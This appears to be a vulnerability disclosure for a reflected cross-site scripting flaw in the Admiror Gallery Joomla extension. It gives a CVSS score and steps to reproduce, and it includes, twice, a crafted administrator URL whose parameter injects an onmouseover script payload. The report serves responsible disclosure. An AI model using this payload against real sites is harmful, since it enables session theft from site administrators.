Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can steal the user’s active session cookie.
Admiror Gallery contains an XSS vulnerability which requires more user interaction than normal XSS but still can be exploited easily to run arbitrary javascript on user's sessions
Install Joomla 3 and install the Admiror extension
Publish the extension
Once done visit the URL http://192.168.1.21/administrator/index.php?option=com_admirorgallery&task=popups&option=com_admirorgallery&task=ag_install&boxchecked=01111&view=resourcemanager&controller=resourcemanager&AG_resourceType=popupseeou3%22onmouseover%3d%22alert(domain)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22n58mtbbt7z6&a754e24e813c693db361a8d5cf6f1f1c=1&AG_fileUpload=&checkall-toggle=&cid[]=fancybox&cid[]=fancybox-downloadButton&cid[]=pirobox&cid[]=slimbox&limitstart=0
Description
Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can steal the user’s active session cookie.
Admiror Gallery contains an XSS vulnerability which requires more user interaction than normal XSS but still can be exploited easily to run arbitrary javascript on user's sessions
Severity: Medium
CVSS Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Steps to reproduce
http://192.168.1.21/administrator/index.php?option=com_admirorgallery&task=popups&option=com_admirorgallery&task=ag_install&boxchecked=01111&view=resourcemanager&controller=resourcemanager&AG_resourceType=popupseeou3%22onmouseover%3d%22alert(domain)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22n58mtbbt7z6&a754e24e813c693db361a8d5cf6f1f1c=1&AG_fileUpload=&checkall-toggle=&cid[]=fancybox&cid[]=fancybox-downloadButton&cid[]=pirobox&cid[]=slimbox&limitstart=0
POC
https://github.com/vasiljevski/admirorgallery/assets/51406427/bab39814-5f2a-4737-951f-31411bca0d7a
The vulnerability was discovered in colloboration with @SivaPothuluru-sajja